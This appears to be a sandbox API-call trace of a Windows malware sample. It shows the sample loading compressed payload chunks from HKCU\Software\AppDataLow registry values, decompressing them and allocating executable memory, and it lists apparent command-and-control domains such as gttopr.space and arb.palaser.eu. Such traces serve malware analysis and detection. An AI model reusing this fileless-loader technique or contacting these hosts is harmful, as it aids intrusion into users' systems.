	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_3") returned 10
	[0088.797] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1d0, lpdwDisposition=0x0) returned 0x0
	[0088.797] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x3, lpData=0x0, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.802] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x20afc7c, lpData=0x2590048, lpcbData=0x20afc88*=0x7d000 | out: lpType=0x20afc7c*=0x3, lpData=0x2590048*, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.860] RegCloseKey (hKey=0x1d0) returned 0x0
	[0088.882] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_4") returned 10
	[0088.882] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1d0, lpdwDisposition=0x0) returned 0x0
	[0088.882] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x3, lpData=0x0, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.887] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x20afc7c, lpData=0x2590048, lpcbData=0x20afc88*=0x7d000 | out: lpType=0x20afc7c*=0x3, lpData=0x2590048*, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.948] RegCloseKey (hKey=0x1d0) returned 0x0
	[0089.069] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_5") returned 10
	[0089.069] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1d0, lpdwDisposition=0x0) returned 0x0
	[0089.069] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x3, lpData=0x0, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0089.075] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x20afc7c, lpData=0x2590048, lpcbData=0x20afc88*=0x7d000 | out: lpType=0x20afc7c*=0x3, lpData=0x2590048*, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0089.085] RegCloseKey (hKey=0x1d0) returned 0x0
	[0089.173] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_6") returned 10
	[0089.173] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0089.173] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x3, lpData=0x0, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0089.179] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x20afc7c, lpData=0x2590048, lpcbData=0x20afc88*=0x7d000 | out: lpType=0x20afc7c*=0x3, lpData=0x2590048*, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0089.252] RegCloseKey (hKey=0x1f8) returned 0x0
	[0089.339] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_7") returned 10
	[0089.339] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0089.339] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x3, lpData=0x0, lpcbData=0x20afc88*=0x55832) returned 0x0
	[0089.343] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x20afc7c, lpData=0x2590048, lpcbData=0x20afc88*=0x55832 | out: lpType=0x20afc7c*=0x3, lpData=0x2590048*, lpcbData=0x20afc88*=0x55832) returned 0x0
	[0089.359] RegCloseKey (hKey=0x1f8) returned 0x0
	[0089.507] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_8") returned 10
	[0089.507] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0089.507] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_8", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x0, lpData=0x0, lpcbData=0x20afc88*=0x0) returned 0x2
	[0089.507] RegCloseKey (hKey=0x1f8) returned 0x0
	[0089.507] RegCloseKey (hKey=0x1d8) returned 0x0
	[0089.507] GetLastError () returned 0x0
	[0089.507] GetLastError () returned 0x0
	[0089.507] GetLastError () returned 0x0
	[0089.507] GetLastError () returned 0x0
	[0089.507] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] GetLastError () returned 0x0
	[0089.508] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0089.509] GetProcAddress (hModule=0x77960000, lpProcName="RtlDecompressBuffer") returned 0x779d6b80
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.518] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.519] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.520] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.521] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.522] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.523] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.524] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.525] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0089.526] GetLastError () returned 0x0
	[0095.680] lstrcpyA (in: lpString1=0x38b5e90, lpString2="xmpp.dolcesognar.it" | out: lpString1="xmpp.dolcesognar.it") returned="xmpp.dolcesognar.it"
	[0095.680] lstrcpyA (in: lpString1=0x38b5eb0, lpString2="xmpp.dolcesognar.it" | out: lpString1="xmpp.dolcesognar.it") returned="xmpp.dolcesognar.it"
	[0095.680] lstrcpyA (in: lpString1=0x38b5ed0, lpString2="spop.lestanzedifederica.com" | out: lpString1="spop.lestanzedifederica.com") returned="spop.lestanzedifederica.com"
	[0095.680] lstrcpyA (in: lpString1=0x38b5ef0, lpString2="arb.palaser.eu" | out: lpString1="arb.palaser.eu") returned="arb.palaser.eu"
	[0095.680] lstrcpyA (in: lpString1=0x38b5f10, lpString2="gttopr.space" | out: lpString1="gttopr.space") returned="gttopr.space"
	[0095.694] GlobalAddAtomW (lpString="LtUMqQ7WiX") returned 0xc18e
	[0095.694] VirtualAlloc (lpAddress=0x0, dwSize=0x595000, flAllocationType=0x3000, flProtect=0x40) returned 0x3f40000
	[0095.857] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x74aa0000
	[0095.858] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExA") returned 0x74abf500
	[0095.858] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExA") returned 0x74abf790
	[0095.858] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCloseKey") returned 0x74abf620
	[0095.858] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenProcessToken") returned 0x74abf520
	[0095.858] GetProcAddress (hModule=0x74aa0000, lpProcName="GetTokenInformation") returned 0x74abf370
	[0095.858] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExA") returned 0x74ac0a20
	[0095.859] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExA") returned 0x74abfa60
	[0095.859] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptExportKey") returned 0x74abfb30
	[0095.859] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptAcquireContextW") returned 0x74ac0590
	[0095.859] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptSetProvParam") returned 0x74ad6c90
	[0095.859] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptReleaseContext") returned 0x74ac0650
	[0095.859] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGenRandom") returned 0x74ac10a0
	[0095.859] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x74abcbe0
	[0095.859] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGenKey") returned 0x74ac3910
